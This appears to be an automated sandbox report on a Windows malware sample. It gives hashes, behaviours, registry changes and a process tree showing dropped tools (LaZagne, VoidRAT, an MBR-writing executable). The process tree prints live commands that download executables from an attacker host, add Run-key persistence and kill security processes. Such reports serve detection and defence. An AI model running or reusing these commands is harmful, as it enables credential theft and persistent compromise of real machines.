Resubmissions
11-02-2024 08:10
240211-j212ragb47 1011-02-2024 08:09
240211-j2kprseb2w 1009-02-2024 18:28
240209-w4c4xsde9t 1002-02-2024 12:52
240202-p4dxwsgfej 1002-02-2024 12:45
240202-pzapnsgdbp 1016-01-2024 15:29
240116-sw8dbaehh3 1010-01-2024 14:41
240110-r2wq2ahchl 1010-01-2024 13:29
240110-qrqatshbg3 1022-12-2023 08:48
231222-kqp1sadghq 10Analysis
-
max time kernel
1789s -
max time network
1810s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
10-01-2024 14:41
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231215-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 4804 lazagne.exe 1124 lazagne.exe 3392 dusers.exe 3584 Users.exe 916 wmild.exe 2592 wmild.exe 4004 wmild.exe 1604 wmild.exe 2132 wmild.exe 5112 wmild.exe 3060 VoidRAT.exe 2188 VLTKNhatRac.exe -
Loads dropped DLL 11 IoCs
pid Process 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe 1124 lazagne.exe -
resource yara_rule behavioral4/files/0x0004000000029e9a-70.dat upx behavioral4/files/0x0004000000029e9a-72.dat upx behavioral4/files/0x0004000000029e9a-74.dat upx behavioral4/memory/3392-73-0x0000000000400000-0x0000000000440000-memory.dmp upx behavioral4/files/0x000400000002a7e4-84.dat upx behavioral4/memory/3584-85-0x0000000000400000-0x0000000000442000-memory.dmp upx behavioral4/memory/3392-107-0x0000000000400000-0x0000000000440000-memory.dmp upx behavioral4/memory/3584-108-0x0000000000400000-0x0000000000442000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000\Software\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 VLTKNhatRac.exe -
Detects Pyinstaller 4 IoCs
resource yara_rule behavioral4/files/0x0002000000029e8c-10.dat pyinstaller behavioral4/files/0x0002000000029e8c-12.dat pyinstaller behavioral4/files/0x0002000000029e8c-13.dat pyinstaller behavioral4/files/0x0002000000029e8c-33.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 5 IoCs
pid Process 1628 taskkill.exe 2556 taskkill.exe 4604 taskkill.exe 1052 taskkill.exe 1804 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe -
Modifies registry class 37 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 5e003100000000002a58a47910004d4143524f4d7e310000460009000400efbe2a58a3792a58a4792e000000e5a70200000004000000000000000000000000000000f7621c014d006100630072006f006d006500640069006100000018000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Key created \Registry\User\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\NotificationData explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000008f577b75100041646d696e003c0009000400efbe8f57596e2a58d2752e0000003957020000000100000000000000000000000000000040b0cb00410064006d0069006e00000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000008f57596e1100557365727300640009000400efbec5522d602a58d2752e0000006c0500000000010000000000000000003a00000000000f37c10055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000008f57596e12004170704461746100400009000400efbe8f57596e2a58d2752e000000445702000000010000000000000000000000000000006bfca6004100700070004400610074006100000016000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 56003100000000002a58a3791000526f616d696e6700400009000400efbe8f57596e2a58a4792e00000045570200000001000000000000000000000000000000a981180052006f0061006d0069006e006700000016000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3632047111-1948211978-3010235048-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 4716 reg.exe 5048 reg.exe 5068 reg.exe 460 reg.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 4844 PING.EXE 1872 PING.EXE 4268 PING.EXE 4116 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1896 explorer.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3316 4363463463464363463463463.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 2556 taskkill.exe Token: SeDebugPrivilege 4604 taskkill.exe Token: SeDebugPrivilege 2188 VLTKNhatRac.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1896 explorer.exe 1896 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3316 wrote to memory of 4804 3316 4363463463464363463463463.exe 100 PID 3316 wrote to memory of 4804 3316 4363463463464363463463463.exe 100 PID 4804 wrote to memory of 1124 4804 lazagne.exe 102 PID 4804 wrote to memory of 1124 4804 lazagne.exe 102 PID 3316 wrote to memory of 3392 3316 4363463463464363463463463.exe 103 PID 3316 wrote to memory of 3392 3316 4363463463464363463463463.exe 103 PID 3316 wrote to memory of 3392 3316 4363463463464363463463463.exe 103 PID 3392 wrote to memory of 2936 3392 dusers.exe 104 PID 3392 wrote to memory of 2936 3392 dusers.exe 104 PID 3392 wrote to memory of 2936 3392 dusers.exe 104 PID 2936 wrote to memory of 3584 2936 cmd.exe 107 PID 2936 wrote to memory of 3584 2936 cmd.exe 107 PID 2936 wrote to memory of 3584 2936 cmd.exe 107 PID 2936 wrote to memory of 4844 2936 cmd.exe 106 PID 2936 wrote to memory of 4844 2936 cmd.exe 106 PID 2936 wrote to memory of 4844 2936 cmd.exe 106 PID 3584 wrote to memory of 4892 3584 Users.exe 109 PID 3584 wrote to memory of 4892 3584 Users.exe 109 PID 3584 wrote to memory of 4892 3584 Users.exe 109 PID 4892 wrote to memory of 4692 4892 cmd.exe 110 PID 4892 wrote to memory of 4692 4892 cmd.exe 110 PID 4892 wrote to memory of 4692 4892 cmd.exe 110 PID 4892 wrote to memory of 1872 4892 cmd.exe 111 PID 4892 wrote to memory of 1872 4892 cmd.exe 111 PID 4892 wrote to memory of 1872 4892 cmd.exe 111 PID 4892 wrote to memory of 916 4892 cmd.exe 112 PID 4892 wrote to memory of 916 4892 cmd.exe 112 PID 4892 wrote to memory of 916 4892 cmd.exe 112 PID 2936 wrote to memory of 3964 2936 cmd.exe 113 PID 2936 wrote to memory of 3964 2936 cmd.exe 113 PID 2936 wrote to memory of 3964 2936 cmd.exe 113 PID 4892 wrote to memory of 2592 4892 cmd.exe 116 PID 4892 wrote to memory of 2592 4892 cmd.exe 116 PID 4892 wrote to memory of 2592 4892 cmd.exe 116 PID 4892 wrote to memory of 2704 4892 cmd.exe 117 PID 4892 wrote to memory of 2704 4892 cmd.exe 117 PID 4892 wrote to memory of 2704 4892 cmd.exe 117 PID 4892 wrote to memory of 4268 4892 cmd.exe 118 PID 4892 wrote to memory of 4268 4892 cmd.exe 118 PID 4892 wrote to memory of 4268 4892 cmd.exe 118 PID 4892 wrote to memory of 4716 4892 cmd.exe 119 PID 4892 wrote to memory of 4716 4892 cmd.exe 119 PID 4892 wrote to memory of 4716 4892 cmd.exe 119 PID 4892 wrote to memory of 1392 4892 cmd.exe 120 PID 4892 wrote to memory of 1392 4892 cmd.exe 120 PID 4892 wrote to memory of 1392 4892 cmd.exe 120 PID 4892 wrote to memory of 2192 4892 cmd.exe 121 PID 4892 wrote to memory of 2192 4892 cmd.exe 121 PID 4892 wrote to memory of 2192 4892 cmd.exe 121 PID 4892 wrote to memory of 1052 4892 cmd.exe 122 PID 4892 wrote to memory of 1052 4892 cmd.exe 122 PID 4892 wrote to memory of 1052 4892 cmd.exe 122 PID 4892 wrote to memory of 1804 4892 cmd.exe 124 PID 4892 wrote to memory of 1804 4892 cmd.exe 124 PID 4892 wrote to memory of 1804 4892 cmd.exe 124 PID 4892 wrote to memory of 1628 4892 cmd.exe 125 PID 4892 wrote to memory of 1628 4892 cmd.exe 125 PID 4892 wrote to memory of 1628 4892 cmd.exe 125 PID 4892 wrote to memory of 2556 4892 cmd.exe 126 PID 4892 wrote to memory of 2556 4892 cmd.exe 126 PID 4892 wrote to memory of 2556 4892 cmd.exe 126 PID 4892 wrote to memory of 4604 4892 cmd.exe 127 PID 4892 wrote to memory of 4604 4892 cmd.exe 127 PID 4892 wrote to memory of 4604 4892 cmd.exe 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Users.exeusers.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "5⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SysWOW64\chcp.comCHCP 12516⤵PID:4692
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 16⤵
- Runs ping.exe
PID:1872
-
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/app.exe6⤵
- Executes dropped EXE
PID:916
-
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe6⤵
- Executes dropped EXE
PID:2592
-
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f6⤵PID:2704
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 66⤵
- Runs ping.exe
PID:4268
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY hkcu\software\microsoft\windows\currentversion6⤵
- Modifies registry key
PID:4716
-
-
C:\Windows\SysWOW64\find.exefind "svr.vbs"6⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exereg delete "hkcu\software\microsoft\windows\currentversion" /v "alg" /f6⤵PID:2192
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f6⤵
- Modifies registry key
PID:5048
-
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f6⤵
- Modifies registry key
PID:5068
-
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/ASUFUSER.exe6⤵
- Executes dropped EXE
PID:4004
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbs"6⤵PID:4956
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:clipboardData.setData('text','5G#JBNGAJAT2tQ^@I@3PJX#)$JHZZTCE');close();"7⤵PID:468
-
-
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f6⤵
- Adds Run key to start application
PID:4168
-
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f6⤵
- Adds Run key to start application
PID:1948
-
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/raauser.exe6⤵
- Executes dropped EXE
PID:1604
-
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/amsql.exe6⤵
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/prochack.exe6⤵
- Executes dropped EXE
PID:5112
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 206⤵
- Runs ping.exe
PID:4116
-
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\JetSwap /f6⤵
- Modifies registry key
PID:460
-
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\Macromedia4⤵PID:3964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"2⤵
- Executes dropped EXE
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1896
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
143KB
MD5f281cf95dc213f2bff31707319f12e52
SHA1cdf5667a12476eb13832e841b84fe7e06f69ef80
SHA2567d4b48559eea4f796bcae254548be0e843d58def5dedc0595b2623afc39cb8b3
SHA512bc8ebc87e7805f606faf50a6f6d96ed04ebb9f300ac40c6d6763f8e0dedf0a0e500c6f4d49373f5a639f4b06e02e81faf88658a93c62d4cfe520f2b445d63b33
-
Filesize
176KB
MD58e5ff764aedb229c2677db94f27e8e1d
SHA10f0f1123f4e85b00ddd9146b64a1f3b16e6654d0
SHA2561ce7c75110bc2cce14786b93a83791849f4d03feaf5a925bc520cefc8403a313
SHA512730a5ac99c33d018ffe839d12075d4732ab6ed4db71ae05384acd19a622197c86fde1184d3d5fbb35957b6501986313b5c8cf45fb67f89b4359aa0b09aa829f0
-
Filesize
317KB
MD549fc11aeb19df92312c0de8a8ed0c529
SHA1b1db3631f26e3bdb42b019d71de25efe3b95aa7f
SHA2560157fbe1daa50a5f600a8c31321476d088fe070222d01510b8e576125990efcc
SHA512a68f7145ddc4aacf3abc23c0ab777d413bdc16a78c94d6f82141f8e0b8800eb88ba637acf6292159591ca6961f7cea564babbb29c2d2addf9a252b18e576e624
-
Filesize
149KB
MD5e202fe9018c2fb175f94458bc552f575
SHA1e3ff5fa15cbaaab66130299468bc59de60af47fd
SHA256f56b5e1d086bd2776696101677ff0a6a0a7991458409b1a851b202a603896c2f
SHA5128cb9b4c006b20ab77945d266c5b9278f5fd423aca7881b2a2752e21ce5ce7ed12feceaa2258ec4e7e0b64c3d4d885aaa8999406f3578435e49b57d8c45f4e58a
-
Filesize
93KB
MD524c10e2576826fbfacfff2811ffe982d
SHA1286b2ea5f9a5edde026810daaefbab2906ffcefe
SHA256998df83daf187d845affcd0a234e5cfd39b7d8e540c41844920ab65b64100169
SHA512e8b81eda344f6bdd246ceada638ae0b490206225a8e922ad6d8a54251af1f38384928976111d4c1843373c39d5d6072729a99f9c6ffbf186f734bca7d0a0a491
-
Filesize
1.8MB
MD52e3087da8ec66d14b4697d63af0968ee
SHA152c3216e96c335d39f6ef17543eb30c8ae661e9c
SHA25651e5b4c33be55fe4e0a526659ee788b59ce3e6938b4c5ecae801b3cfbb5bdfeb
SHA512824060d0eabe75b1dced08d67fa25bce717d335a3cb35cd230dc739b4edff1c8ef923e60fea8c370e163ccbfcc3b7ddda79470260e8d390a68e8988b1f3ca08a
-
Filesize
179KB
MD5d5acebad2bebf3e6148c4aa787e54ffb
SHA197cbc073497024de7ca2b1ed08e54d7c1d242718
SHA256408a5d1c3eb8bb79ef1d9ff55bc49a65e1ce00340bd1ce581c9c494d1c7bf890
SHA512396f798c9b38956c94b0d4d614e90275ea643a8d0716c1c078843664b629f5df7e6f508c9b79011a2afc9fd67ce58bf99e01cb99746efe7f1c2770c054153abb
-
Filesize
120KB
MD501aed13f70521557379f87bac7e4b0c4
SHA13de1503c10514cdd0d0b87e8bc4ad35ac07740cd
SHA256f1f342f54cd19adb75ed8a7cac659a7f841dfdc42baa244d49f769624410fec9
SHA512e50e78c0b9fc2982a54dd74e1500168d1718286c1aefd7c48a3a9b1fac9e6fa19bd6b803e3becd7fd731d56e773d0a1c9da1331c0e1eda11bc88e75581eae679
-
Filesize
207KB
MD580adc9e5666a4b94fe1637f92d0611b0
SHA1478bb364184d882005d0503c91a9929d81e89765
SHA256eb9a70ac0d1f7c413f10f5308bda81e1da5a9b5bfd2ab7c8d89232eada71c143
SHA512f7eac083f93f5022d8a580303a16c1e12532f6c0dc89e338eb7585d5233c52f39fa7b3e06c06511e6dc68e398151be30074346e66eaccb972f1c497a893d88de
-
Filesize
1.1MB
MD58bb52372b944b5c44bb99cb95c95421a
SHA18c2731d6b5fe24e5a92e83375fb09e1c5cdb14ee
SHA2561ffbc939dfb0528bfc5e334c3f2fcd6103becb4bf49745610decf4c000a208a9
SHA512d562c5e6cd5866c7b8b7753fed7500caf907b664aa2d2c2e13c5e51e331b3f3778ff1810b81c3e7851f7001f860bab6d6342b6bd221c0a2cfecdda1fcdbdf864
-
Filesize
405KB
MD596aad4a7ac151343e6b32f8b7f0a16e7
SHA1aa99a53ec8411a1c18319de464d46377bb8b78cf
SHA2561c14128bedd0c3a43027c0a253120f3b254ad11f949b880843037de861783107
SHA512c1b8303a2186c1a392452d19e75ca1013cad7a13e11551f62dcef38ce1895f9d47188cfb4d85c5b34588f75904b6bda0f6594da88b13e33fb5d454470f0fc653
-
Filesize
347KB
MD5ae1676e2801102fdeefb4543392f7051
SHA19f482de2d06a317737d862b2303805daf2255dd0
SHA256605b3aec78522421e10a1f7053332c53d4cb418295a1711cc21af120f5d513f3
SHA5122000745189daf28878b00ab488cb41077c1dbe36526491e7a8f87ba71fb1a1916e6db81a8b561417e77406a405a41915c8ab03fec10567bc36278559b4451585
-
Filesize
209KB
MD5bfe0ac5478d609d0616abb254e670bf9
SHA1c14a042299ebab1cc4df5197b8db8b338eba7adf
SHA256003db8e30ce661c366df3ed8864c1dfcfde9dc3ae292c9cd9bb7db724846c14a
SHA512fa4e4abd7beba2f4b27b79e2d583d5049440fea98d22b5a18c426be30c64031b4f4570136fe3866d30cd01da230e8a7d3603b08570190840a441b4611ca1584f
-
